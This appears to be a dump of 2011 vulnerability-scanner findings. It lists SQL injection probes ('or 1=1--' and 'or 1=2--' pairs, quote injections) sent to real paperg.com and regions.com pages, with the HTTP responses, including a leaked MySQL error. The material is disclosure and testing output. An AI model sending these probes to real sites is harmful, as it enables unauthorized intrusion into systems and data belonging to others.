| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3864 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Pathways - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Pathways" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> <!-- ...[SNIP]... | 
| GET /flyerboard/pathways/155218914863%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/pathways/1753 | 
| GET /flyerboard/pathways/175314406727%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3864 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Pathways - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Pathways" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> <!-- ...[SNIP]... | 
| GET /flyerboard/pathways/175314406727%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:36 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/residence-inn | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:27 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3946 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Residence Inn By Marriott" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:28 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/residence-inn | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:29 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3946 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Residence Inn By Marriott" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:31 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/seton-health | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:23 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3873 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Seton Health - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Seton Health" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> < ...[SNIP]... | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:24 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/seton-health | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:28 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3873 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Seton Health - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Seton Health" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> < ...[SNIP]... | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:29 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/your-business | 
| GET /flyerboard/your-business Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4596 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Your Business or Event Could Be Here - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Your Business or Event Could Be Here" /> <meta name="description" content = "Looking to publicize your business or event? Post a flyer on the Flyerboard to reach hundreds of thousands of local residents. Upload any image and the Flyer..." /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : ...[SNIP]... | 
| GET /flyerboard/your-business Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:44 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 47808 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1552''' at line 1 var view_all_board = document.getElementById( if(view_all_bo ...[SNIP]... | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:45 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 47689 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/company | 
| GET /about_regions'/company_info.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:53:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /about_regions''/company_info.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:53:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/email | 
| GET /about_regions'/email_fraud.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 187 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /about_regions''/email_fraud.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/privacy | 
| GET /about_regions'/privacy_security.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:43:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 192 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /about_regions''/privacy_security.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:43:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/protecting | 
| GET /about_regions'/protecting_self_online Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:48:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /about_regions''/protecting_self_online Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:48:34 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /about_regions/report | 
| GET /about_regions'/report_fraud.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:44:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /about_regions''/report_fraud.rf HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:44:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/email | 
